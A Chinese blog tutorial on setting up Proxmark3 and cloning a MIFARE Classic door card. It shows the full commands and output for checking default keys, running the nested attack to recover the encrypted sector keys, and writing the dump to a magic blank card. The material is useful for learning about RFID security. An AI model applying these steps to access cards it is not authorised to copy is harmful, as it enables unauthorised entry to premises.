PM3环境搭建和M1卡复制
PM3环境搭建
windows的环境搭建比较麻烦,有虚拟机的话可以用虚拟机,强烈安利WSL(Windows subsystem for Linux),非常友好。
接下来介绍基于Ubuntu的环境搭建,参考PM3Wiki
首先检查更新
sudo apt-get update && sudo apt-get upgrade
然后安装所依赖的工具
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
拉源码
git clone https://github.com/proxmark/proxmark3.git
当然可以使用第三方的固件,如Iceman
git clone https://github.com/RfidResearchGroup/proxmark3.git
然后获取最新的内容,进行权限配置
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout
编译源文件
make clean && make all
然后就可以插入PM3了,由于我用的是WSL,Ubuntu与主机共用串口,所以需要先确定端口号,为COM7,就可以直接连接了,
sudo ./proxmark3 /dev/ttyS7
M1卡破解
首先进行卡片类型识别,先查看没有卡的时候天线信号
proxmark3> hw tuneMeasuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @ 125.00 kHz
# LF antenna: 29.84 V @ 134.00 kHz
# LF optimal: 31.21 V @ 130.43 kHz
# HF antenna: 24.53 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
将卡放在高频区,再进行天线信号检测
Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @ 125.00 kHz
# LF antenna: 30.94 V @ 134.00 kHz
# LF optimal: 32.31 V @ 130.43 kHz
# HF antenna: 19.60 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
发现HF电压发生明显变化,则该卡为高频卡,同样也可用该方法识别低频卡,使用进一步的命令,识别该卡为M1卡
proxmark3> hf searchUID : 60 64 7d 26
ATQA : 00 04SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAKValid ISO14443A Tag Found - Quiting Search
查看扇区是否采用默认密码,
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no: 0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A |key B |
|---|----------------|----------------|
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
|004| ffffffffffff | ffffffffffff |
|005| ffffffffffff | ffffffffffff |
|006| ffffffffffff | ffffffffffff |
|007| ffffffffffff | ffffffffffff |
|008| ffffffffffff | ffffffffffff |
|009| ffffffffffff | ffffffffffff |
|010| ffffffffffff | ffffffffffff |
|011| ffffffffffff | ffffffffffff |
|012| ffffffffffff | ffffffffffff |
|013| ffffffffffff | ffffffffffff |
|014| ffffffffffff | ffffffffffff |
|015| ffffffffffff | ffffffffffff |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory
具体的命令使用说明,可以自行help
发现部分扇区采用默认密码。ffffffffffff
M1卡存在漏洞,可以通过已知扇区的key破解加密扇区的key
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no: 0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| 112233445566 | 1 | 01206f340100 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| 50f6a442e26d | 1 | e59925b18b43 | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
已成功破解其他加密扇区的key,并且写到了dumpkeys.bin文件中,需要将该文件转化成PM3认识的格式才可进行门卡的复制
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml-----Finished
proxmark3>
然后将白卡放在高频区,把数据写到白卡里
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml
大功告成!!!
参考链接:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/
PM3环境搭建和M1卡复制相关推荐
- 用ARDUNO自制RFID读写器、复旦M1卡初探
1. 为什么要用Arduino 一提到,我们可能会想到ACR122.Proxmark3这些设备,还有Radiowar出售的专业级RFID设备,实际上我们完全可以自己使用arduino单片机和RC522 ...
- Mac (M1) 软件及环境搭建
Mac (M1) 软件及环境搭建 1.JDK 2.maven 3.idea2022 4.git 5.mysql5.7 6.redis 7.rabbitmq 8.smartGit 写在前面 说明:电脑版 ...
- MySQL:环境搭建,初识数据库----Datawhale第一次打卡笔记
SQL基础教程 声明:此博客内容整理自Datawhale打卡学习,且据打卡内容整理为笔记,转载请联系Datawhale及我本人授权,必须注明转载来源. 文章目录 Chapter 0 .环境搭建 0.1 ...
- MacBook M1 Flutter环境搭建
最近入手了Apple M1,MacBook Air,由于之前未使用苹果系列产品,并且Flutter官方和各项配套的软件环境也还没有成熟,导致搭建环境时碰到了不少坑,这里总结记录一波,来看文档的同学,有 ...
- M1 Dock智能硬件环境搭建(MaixPy安装及使用)
目录 1.背景 2.环境搭建 2.1.更新MaixPy 固件 2.2.安装MaixPy IDE 2.3.运行MaixPy IDE 2.4.串口工具调试 1.背景 最近学习一款优秀的开源AI开发套件M1 ...
- 【Android】Mac M1 Android开发环境搭建(Android Studio和JDK安装)
Mac M1 Android开发环境搭建 简介 Mac M1 Android Studio安装 Android Studio cannot open Local Terminal 解决方法 Mac M ...
- proxmark3 复制 M1 卡和 CUID卡的方法
proxmark内部有个卡模拟内存,emulator memory,过程大概是这样 1,把各个扇区的密码装载进 emulator memory 2,把卡扇区数据读进去 emulator memory ...
- flutter mbp m1环境搭建
一.flutter mbp m1环境搭建 1.1.下载flutter sdk 进入 Flutter 官网下载flutter SDK. 首先看到系统要求,如下: 需要64位操作系统.磁盘空间不小于2.8 ...
- 学习笔记之-Kubernetes(K8S)介绍,集群环境搭建,Pod详解,Pod控制器详解,Service详解,数据存储,安全认证,DashBoard
笔记来源于观看黑马程序员Kubernetes(K8S)教程 第一章 kubernetes介绍 应用部署方式演变 在部署应用程序的方式上,主要经历了三个时代: 传统部署:互联网早期,会直接将应用程序部署 ...
- P8-DevOps中的CI/CD环境搭建与调优
DevOps中的CI/CD环境搭建与调优 DevOps,Docker,云计算等等 一.知识点回顾 上节课内容: P8架构中项目中所需要的 Canal,主要用于 MySQL 主从架构增量或全量备份,将数 ...
最新文章
- 手把手实现火爆全网的视频特效 “蚂蚁呀嘿”,太魔性了
- 11.python并发入门(part8 基于线程队列实现生产者消费者模型)
- 按逆向思维定义软件测试,软件测试基础相关概念
- 技术动态 | TechKG:一个面向中文学术领域的大型知识图谱
- springboot怎么杀进程_全新Steam在线游戏 Among us太空狼人杀攻略
- Asp.Net IIS 管理类(全)
- ecshop如何增加多个产品详细描述的编辑器
- 二阶系统阶跃响应实验_二阶系统阶跃响应实验报告
- RouterPassView – 路由密码查看器
- 详解Java 12新特性:switch表达式
- Unity 入门教程:贪吃射(1) —— Unity 安装和项目创建
- jboss portal+MySql5 安装使用手册
- Mysql 编程实战三之计算两个日期的工作日数
- txt电子书如何用Windows电脑阅读?
- Carson带你学Android:图文详解RxJava背压策略
- 国外安全网站、社区论坛、博客、公司、在线工具等整合收集
- github开源代码下载并运行
- 【03月04日】A股滚动市盈率PE历史新低排名
- termux获取sd卡读写权限_stm32 SPI读写储存卡(MicroSD TF卡)
- opencore 启动总是在win_刷黑苹果之后无法进入BIOS设置opencore